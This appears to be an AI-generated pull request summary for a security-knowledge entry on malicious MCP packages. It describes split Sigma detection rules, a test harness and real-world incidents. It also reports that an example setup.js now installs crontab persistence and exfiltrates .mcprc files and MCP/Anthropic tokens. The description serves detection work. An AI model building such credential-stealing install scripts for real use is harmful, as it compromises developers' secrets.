The rule declared a single `product: mcp / service: package_manager` log source but mixed package-registry fields with **Sysmon** fields (`EventID`, `ProcessName`, `TargetFilename`) that no MCP source emits, so most selections could never populate. Split into two coherent rules:

- `detection-rule.yml` — MCP package-registry metadata (typosquats; new maintainer accounts publishing from low-reputation sources).
- `detection-rule-host-telemetry.yml` — Sysmon network/persistence indicators, **gated on package-manager/runtime processes** to cut false positives.

Added a test harness (`test_detection_rule.py` + `test-logs.json`) — a small Sigma evaluator — proving both rules fire on the described behavior and **not** on benign activity (**12/12**, all selections exercised). Narrowing is verified: new-author-alone, bad-source-alone, `.mcprc` creation, and browser→discord all correctly do not fire.

## Other review findings

- **README ↔ files synced**: README now embeds both rules verbatim (logic identical to shipped files) and links the canonical files so they can't drift again.
- **Example Scenario now realizes its claims**: `setup.js` registers a `crontab` entry that actually runs the dropped `~/.mcp-health-check` payload (persistence realized), and exfiltrates MCP-specific data (`.mcprc` + MCP/Anthropic tokens) instead of a generic `process.env` dump. The dropped filename matches the host rule's persistence selector.
- **First Observed corrected**: it is no longer theoretical — documented the real-world `postmark-mcp` incident (Sept 2025, first malicious MCP server found in the wild) in a new **Real-World Incidents** section, plus the 2025-2026 AI-tooling campaigns (LiteLLM, Shai-Hulud).
- Added an attack-flow mermaid diagram; defined typosquatting / dependency confusion on first use; cited the two previously uncited claims and wove in the four orphaned references; fixed the `Assistant` author; reworded the "multiple documented cases" citation to match its single source.

## Test

```
python3 techniques/SAF-T1002/test_detection_rule.py
# Test Summary: 12/12 tests passed (100.0%)
```

🤖 Generated with [Claude Code](https://claude.com/claude-code)